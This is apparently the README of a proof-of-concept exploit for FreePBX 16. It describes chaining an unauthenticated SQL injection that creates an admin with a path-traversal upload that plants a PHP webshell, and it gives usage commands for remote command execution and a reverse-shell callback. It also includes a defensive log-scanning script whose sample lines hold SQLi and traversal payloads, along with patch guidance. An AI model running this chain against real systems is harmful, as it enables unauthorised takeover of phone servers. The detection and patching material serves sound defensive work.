## https://sploitus.com/exploit?id=A52A5B67-31DB-5B86-B528-C2F4F2A57FB3
# FreePBX 16 — Unauthenticated SQLi to RCE
Proof-of-concept exploit chaining two FreePBX vulnerabilities to go from **zero access** to
**remote code execution** on FreePBX 16.
| CVE | Component | Impact |
|-----|-----------|--------|
| **CVE-2025-57819** | Endpoint module loader (`brand` parameter) | Unauthenticated stacked SQL injection |
| **CVE-2025-61678** | Endpoint Manager firmware uploader (`fwbrand` parameter) | Authenticated arbitrary file upload (path traversal) |
## How it works
1. **Create an admin (CVE-2025-57819)** — a stacked SQL injection reachable without authentication
via the namespaced endpoint loader is used to `INSERT` a brand-new full-access administrator
directly into the `ampusers` table.
2. **Authenticate** — the PoC logs into the admin panel as the freshly created user.
3. **Drop a webshell (CVE-2025-61678)** — the Endpoint Manager firmware upload handler is abused
with a `../../../var/www/html/` traversal in `fwbrand` to write a PHP webshell into the
web root.
4. **Execute** — run a single command or receive an interactive reverse shell.
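A defender-side counterpart to the chain above, added here as an example that is not part of the PoC: it flags the two request indicators (statement stacking in `brand`, traversal in `fwbrand`) in constructed web-server log lines, and lists full-access `ampusers` accounts that are not on an allowlist (the artifact step 1 leaves behind). The request paths, the log lines and the convention that `sections` holds `*` for full access are assumptions; if `fwbrand` is sent in a POST body rather than the query string, a default access log will not record it.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (Apache combined format). The request paths are
# hypothetical placeholders, not the real FreePBX endpoint/firmware-upload URLs.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2025:10:01:02 +0000] "GET /admin/ajax.php?module=endpoint&brand=sangoma HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Sep/2025:10:01:05 +0000] "GET /admin/ajax.php?module=endpoint&brand=x%27%3BINSERT%20INTO%20ampusers%20-- HTTP/1.1" 200 64 "-" "python-requests/2.31"',
    '203.0.113.7 - - [10/Sep/2025:10:01:09 +0000] "POST /admin/config.php?display=endpoint&fwbrand=..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2F HTTP/1.1" 200 17 "-" "python-requests/2.31"',
    '198.51.100.4 - - [10/Sep/2025:10:02:00 +0000] "GET /admin/config.php?display=endpoint&fwbrand=sangoma HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
# Indicators from the two advisories: statement stacking in `brand`,
# directory traversal in `fwbrand`.
SQLI_RE = re.compile(r"['\"][^;]*;|;\s*(insert|update|delete|select|drop)\b", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")

def check_line(line):
    """Return (client_ip, rule, decoded_value) for each suspicious parameter."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    ip, _ts, _method, target = m.groups()
    # parse_qs decodes once; a second unquote catches double-encoded values.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = []
    for name, values in params.items():
        for raw in values:
            value = unquote(raw)
            if name == "brand" and SQLI_RE.search(value):
                hits.append((ip, "CVE-2025-57819 stacked-SQLi indicator", value))
            if name == "fwbrand" and TRAVERSAL_RE.search(value):
                hits.append((ip, "CVE-2025-61678 path-traversal indicator", value))
    return hits

def scan(lines):
    return [hit for line in lines for hit in check_line(line)]

def unexpected_admins(ampusers_rows, known_admins):
    """Given (username, sections) rows from `ampusers`, flag full-access accounts
    not on the allowlist. Assumes `sections` holds '*' for full access."""
    return [u for u, sections in ampusers_rows if sections == "*" and u not in known_admins]

if __name__ == "__main__":
    for ip, rule, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{rule}\t{value}")
    print(unexpected_admins([("admin", "*"), ("svc_unknown", "*")], {"admin"}))
```

Feed real access-log lines to `scan()` and the output of `SELECT username, sections FROM ampusers` to `unexpected_admins()` when triaging a suspected compromise.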
## Affected versions
FreePBX 16 with the Endpoint module earlier than `16.0.92` is affected; the fix is also shipped in `17.0.6`.
Update to a fixed release.
## Requirements
```bash
pip install requests pwntools
```
## Usage
```bash
# single command
python3 exploit.py --rhost pbx.example.com --command "id"
# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
```
### Options
| Flag | Description |
|------|-------------|
| `--rhost` | Target host (required) |
| `--rport` | Target port (default `443`) |
| `--http` | Use HTTP instead of HTTPS |
| `--lhost` / `--lport` | Reverse-shell callback address |
| `--command` | Run a single command instead of a shell |
## Disclaimer
This proof-of-concept is provided strictly for educational purposes and authorized security
testing. It is intended for use only against systems you own, or for which you have obtained
explicit, documented written permission to test (e.g. an authorized penetration test, bug bounty
program in scope, or CTF environment).
Unauthorized access to computer systems is illegal in most jurisdictions. The author and any
contributors assume no liability and are not responsible for any misuse, damage, or legal
consequences arising from the use of this software. By using this PoC, you agree that you are
solely responsible for ensuring you have the legal right to test the target system.
## License
This PoC is provided as-is for educational and authorized security testing purposes, without
warranty of any kind, express or implied. The author disclaims all liability for any direct,
indirect, incidental, or consequential damages arising from its use.
## Keywords
FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk ·
CVE-2025-57819 · CVE-2025-61678 · unauthenticated SQL injection · stacked query injection ·
endpoint module · Endpoint Manager · authenticated file upload · path traversal ·
remote code execution · RCE · PoC · exploit · VoIP security
---
Author [TYehan](https://tyehan.github.io/)